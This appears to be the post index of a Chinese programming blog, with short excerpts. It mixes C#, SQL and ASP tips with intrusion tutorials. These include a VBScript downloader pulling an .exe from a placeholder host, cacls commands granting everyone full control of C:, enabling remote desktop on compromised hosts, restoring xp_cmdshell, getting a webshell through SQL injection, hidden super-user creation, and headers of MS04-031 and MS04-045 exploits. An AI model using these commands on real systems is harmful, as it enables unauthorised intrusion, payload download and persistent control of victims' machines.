DcBoy's Blog

转载 动态编译c#

publicbool CompileScripts(stringassemblyName, string path,bool debug) {92 93// find all CSharp files

原创 今天发现一个变态的游戏代码

<br />某个flash在线游戏,写法非常变态.全部变量参数都用table实现,NND连个字符串也放到tab文件里面...<br />通讯采用socket,发送一大堆json编码......<br />无人读懂的json 无名称,无列名<br />全部r0 r1 r2 r3 ....<br />变态 连一个ID也要分到3个{obj1 obj2 obj3}<br /> <br />彻底被打败

原创 秒拍网站分析

<br />近日网上流行秒拍。。在一定时间内 最后一位出价者 获得奖品<br /> <br />这些秒拍网站盈利点很牛B，每拍一个时间增加8-10秒 使得更多人去点秒杀。。。但是这样一来 只有一个结果，就是最多X币的人会胜出<br />也就是说谁冲多了，谁就是最后胜利。。。。这些都是RMB啊。。。<br /> <br />而且这些网站在后台上面容易做手脚，他能判断这个商品目前使用了多少个X币。如果没到设置的X币 也就是亏本情况下，系统自动发出匿名秒杀者。。。。一直去忽悠真正的秒杀者。。。<br /> <br

原创 c#winform使用webkit自定义扩展

最近研究了用webkit来做界面，非常舒服，主要实现就是webkit与winform的交互，那么就需要扩展webkit，增加一个函数可以调用c#的函数，同时webkit已经可以对document执行invokescript,因此需要下载webkit源码，在DOMWindow.cpp中增加你想要要函数void DOMWindow::ExternalCall(const String& page, const String& action,const String& param){ i

原创 c#winform使用webkit自定义扩展

<br />最近研究了用webkit来做界面，非常舒服，主要实现就是webkit与winform的交互，那么就需要扩展webkit，增加一个函数可以调用c#的函数，同时webkit已经可以对document执行invokescript,因此需要下载webkit源码，在DOMWindow.cpp中增加你想要要函数void DOMWindow::ExternalCall(const String& page, const String& action,const String& param){

原创 ByteArray类,实现Flash的ByteArray方法

ByteArray类,实现Flash的ByteArray方法

原创 SQL常用命令使用方法

1) 数据记录筛选： sql="select * from 数据表 where 字段名=字段值 order by 字段名 [desc]" sql="select * from 数据表 where 字段名 like %字段值% order by 字段名 [desc]" sql="select top 10 * from 数据表 where 字段名 order by 字段名 [desc]" sql="

原创 Do All in Cmd Shell

目录1，前言2，文件传输3，系统配置4，网络配置5，软件安装6，Windows脚本7，附言前言Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。文件传输对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或44

原创 asp查看系统用户和进程的代码

dim objon error resume nextfor each obj in getObject("WinNT://.")err.clear%>-->%>系统用户(组)系统进程else%>()　　next %>

原创 命令行安装终端服务

首先，telnet到该机器上面（具体怎么样上去不需要我说了吧），然后在命令行下输入如下三行命令： c:/>echo [Components] > c:/aa c:/>echo TSEnable = on >>c:/aa c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/aa /q /r

原创 在webshell下安全执行EXE程序

有时候在WEBSHELL下面执行EXE程序常常会导致IIS崩溃有一种方法比较方便 首先查看系统时间time /T获得当前时间添加到at time xxx.exe用at命令查看任务是否被添加

原创 更改目录权限

cacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:Fcacls.exe c: /E /T /G everyone:F

原创 gcc for windows 环境搭建

gcc for windows 环境搭建安装好mingw 如果,安装在C:/MinGW设置环境变量如下:PATH ： C:/MinGW/bin; (如果安装过其他c++编译器,务必把你要使用的编译器路径放在最前面)LIBRARY_PATH ：C:/MinGW/libC_INCLUDE_PATH ：C:/MinGW/includeCPLUS_INCLUDE_PATH ：C:/MinGW/incl

原创 Backend-Advisories

原创 最新Exploit

原创 创建触发器

create trigger trig_notic_UIon notic for insert,updateasupdate notic set memo=memo+where id in(select id from inserted) go/*trig_notic_UI  触发器名称 自定义notic 需要触发的表名memo 需要更新的字段id  是主键*/

原创 Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)

Date : 31/12/2004/* HOD-ms04031-netdde-expl.c: 2004-12-30: PUBLIC v.0.2 * * Copyright (c) 2004 houseofdabus. * * (MS04-031) NetDDE buffer overflow vulnerability PoC *

原创 Microsoft WINS Remote Code Execution Exploit (MS04-045)

Date : 31/12/2004CAN-2004-1080/*************************************************************//* ZUCWins 0.1 - Wins 2000 remote root exploit */

原创 cmd下载文件方法

Set xPost = CreateObject("Microsoft.XMLHTTP")  xPost.Open "GET","http://www.xx.com/dc.exe",0   下载文件的地址xPost.Send()  Set sGet = CreateObject("ADODB.Stream")  sGet.Mode = 3  sGet.Type = 1  sGet.Open() 

原创 当SA遇到XP_CMDSHELL时

有时候在入侵的时候总是碰到先烦恼的问题，比如SA遇到xp_cmdshell时，如果管理员把xp_cmdshell删了怎么办呢？总是眼看着肉鸡跑了吧！今天我就对XP_CMDSHELL做一先解释，希望大家能看明白，能看懂众所周知，在MSSQL中，通过XP_cmdshell存储扩展，拥护具有sysadmin权限，用来执行系统任意命令但是那先网管也不是吃素的，都回把它删除，所以在SQL Injection

原创 深入挖掘Windows脚本技术

得益于com技术的支持，WSH能提供比批处理(.bat)更强大的功能。说白了，wsh不过是调用现成的“控件”作为一个对象，用对象的属性和方法实现目的。 常用的对象有： WScript Windows脚本宿主对象模型的根对象，要使用WSH自然离不开它。它提供多个子对象，比如WScript.Arguments和WScript.Shell。前者提供对整个命令行参数集的访问，后者可以运行程序、操纵注册表内

原创 突破TCP/IP筛选到3389终端登陆

一：得到webshell今天晚上的一次小小测试，由于本人太菜，再高深的技术我也不会，只能这样了..........一切都已经过去了，没有办法补图了，希望能看的懂这个小帖子。今天有是无聊的一天，晚上实在无聊没有事情干，就到一个视频聊天站点看秀，嘿嘿~突然发现一个聊天室特别的火暴，人数已经有500人在里面了（满员了），刷了n次也没有进去..........更加郁闷了！：（想想反正也是没有事情做，测试一

原创 绿色开启终端的简单方法

今天介绍的这种开终端的方法，绿色，环保，无污染~~不须上传任何文件开启终端的方法适合win2k,xp,2003.本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~在无须传任何文件的情况下开启终端服务。 一、win 2k下终端开启终端首先用ECHO写一个3389.reg文件,然后导入到注册表，echo代码如下：echo Windows Registry Ed

原创 蓝屏的原创添加超级用户的.asp代码

 [转载]蓝屏的原创添加超级用户的.asp代码 凯文改进 Ms未公布的漏洞信息来源：冰点论坛作者:凯文 (kevin1986).network对象脚本权限提升漏洞利用工具用户:密码:  if request.servervariables("REMOTE_ADDR")  response.write "iP !s n0T RiGHt"else  if request("username")   

原创 DISCUZ漏洞与提升权限

DISCUZ漏洞与提升权限这个漏洞是孟兄发现的,我在这里感谢他!也感谢ANGEL的分析!DISCUZ 2.2F的这个漏洞在register.php 的代码中:有如下代码： $email = trim($email); if(!$doublee && strstr($email, @)) {　　$emailadd = "OR email=$email";}

原创 扩展储存过程被删除以后可以有很简单的办法恢复

★Dbcc的一个用法扩展储存过程被删除以后可以有很简单的办法恢复：比如：删除DROP PROCEDURE sp_addextendedprocDROP PROCEDURE sp_OACreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_OACreate","odsole70.dll")dbcc addexte

原创 用BACKUP得到一个asp的shell

This article is about how to get a webshell when SQL Injecting under MSSQL database.  The method seems work well since the day I found her(July 2003). You dont need the sa privilege, just a dbowner i

原创 ASP中各种数据库连接代码

MS Access数据库连接 用DSN连接并且没有用户名和密码：set conn = Server.CreateObject("ADODB.Connection")conn.open "YourDSNName"%>用DSN连接并且有用户名和密码：set conn = Server.CreateObject("ADODB.Connection")conn.open "YourDSNNam

原创 如何建立隐藏的超级用户

前几天在某个网站看到了一篇介绍如何建立隐藏的超级用户的图文教程，给我了很大的启发，作者只说明了如何在本地图形界面下建立隐藏的超级用户，且作者说他无法在命令行下实现隐藏的超级用户的建立，于是我就开始自已摸索，刚开始时，我用reg.exe（3.0版)作为命令行下导出导入注册表文件的工具，但每次导入以后，建立的隐藏的超级用户总不能用，后来打开注册表查看，发现这个隐藏的超级用户的默认数据类型并没有被导入注

转载 ADO.net 中数据库连接方式(微软提供)

在MSDN中，.net的数据库连接字符串都有详细的说明，我这里以代码范例的方式罗列一些，具体的每一项代表的意义可以参看MSDN.ADO.net 中数据库连接方式(微软提供)微软提供了以下四种数据库连接方式：System.Data.OleDb.OleDbConnectionSystem.Data.SqlClient.SqlConnectionSystem.Data.Odbc.OdbcConn

原创 SQL SERVER与C#中数据类型的对应关系

?/// ??/// 数据库中与C#中的数据类型对照??/// ??/// ??/// ??private string ChangeToCSharpType(string type)??{???string reval=string.Empty;???switch(type.ToLower())???{????case "int":?????reval= "Int32";?????break;?

原创 用 CSS 替照片加護貝

[懶人拍照] 用 CSS 替照片加護貝有時候我們不太喜歡自己分享的照片在未經知會的情形下，三兩下的就被滑鼠右鍵複製或者更直接的，把照片拖曳到讀者的桌面雖然 google 一下，就會找到很多很多的 Javascript 來防賭這樣的情形但又覺得那些語法很困難，一旦有了問題不知道怎麼調整而且很可能還會有其他的副作用實在有些傷腦經在上一篇文章裡，我們提到了用 CSS 背景

原创 讨厌access数据库

今天有个很气氛的事情 原来Memo是关键字不能用 TMD  F MS

原创 ((DataRowView)e.Item.DataItem)["parentid"]

((DataRowView)e.Item.DataItem)["parentid"]

原创 文件加解密

加密：static String Encrypt(String pwd) {DESCryptoServiceProvider desc = new DESCryptoServiceProvider();//des进行加密PasswordDeriveBytes db = new PasswordDeriveBytes(pwd, null);//产生keybyte[] key = db.GetByte

原创 利用System.IO中的Directory类对目录进行基本操作

//创建目录  Directory.CreateDirectory("c://Dir_name");         //删除目录   Directory.Delete("c://Dir_name");   //或   Directory.Delete("c://Dir_name",false);    //当待删除目录下有文件或子目录时，抛出异常，除非第二个参数为true   //判断一

转载 url正则表达式提取

@".*?)(""||/s)/s+.*?>(?.*?)"

转载 XmlHttp异步获取网站数据的例子

var oDiv var xh  function getXML(){ oDiv = document.all.m oDiv.innerHTML = "正在装载栏目数据，请稍侯......." oDiv.style.display= "" xh = new ActiveXObject("Microsoft.XMLHTTP") xh.onreadystatechange = getReady xh.

原创 url提取方法

public static ArrayList GetLinks(string htmlContent)  {   Match mMatch;   ArrayList aMatch = new ArrayList();   mMatch = Regex.Match(htmlContent, "href//s*=//s*(?:/"(?[^/"|^/]*)/"|/(?[^/]*)/|(?[^>

转载 2进制、8进制、10进制、16进制...各种进制间的轻松转换（c#)

?在.NET Framework中，System.Convert类中提供了较为全面的各种类型、数值之间的转换功能。其中的两个方法可以轻松的实现各种进制的数值间的转换：Convert.ToInt32(string value, int fromBase)：可以把不同进制数值的字符串转换为数字，其中fromBase参数为进制的格式，只能是2、8、10及16:如Convert.ToInt